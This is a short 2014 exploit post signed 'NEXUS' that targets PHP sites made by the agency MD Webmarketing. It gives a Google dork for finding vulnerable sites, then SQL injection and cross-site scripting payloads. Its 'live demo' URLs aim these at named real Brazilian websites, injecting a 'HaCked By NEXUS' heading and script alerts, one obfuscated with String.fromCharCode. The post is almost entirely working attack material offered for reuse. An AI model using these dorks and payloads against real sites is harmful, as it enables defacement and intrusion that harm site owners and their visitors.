Friday, 4 July 2014

MD Webmarketing Cross Site Scripting / SQL Injection

Dork:
"Desenvolvido por: MD-WEBMARKETING" inurl:.php?id=

Exploits:
http://www.site-web.com/***.php?id= [SQL Injection]
http://www.site-web.com/***.php?id=**********&busca= [Cross Site Scripting]

Live Demo:

SQL Injection:
http://www.pierreadrileiloes.com.br/exibe.php?id=61712%27



XSS (with HTML scripts):
http://www.edinhoneves.com/exibe.php?id=231&cod_editorial=1&url=index.php&pag=0&busca=%22%3E%3Ch1%3EHaCked%20By%20NEXUS%20!%3C/h1%3E


XSS (with JavaScript):
http://www.edinhoneves.com/exibe.php?id=231&cod_editorial=1&url=index.php&pag=0&busca=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
http://www.edinhoneves.com/exibe.php?id=231&cod_editorial=1&url=index.php&pag=0&busca=%22%3E%3Cimg%20src=x%20onerror=alert%28%22NEXUS%22%29;%3E 


NEXUS - Sharing Is Caring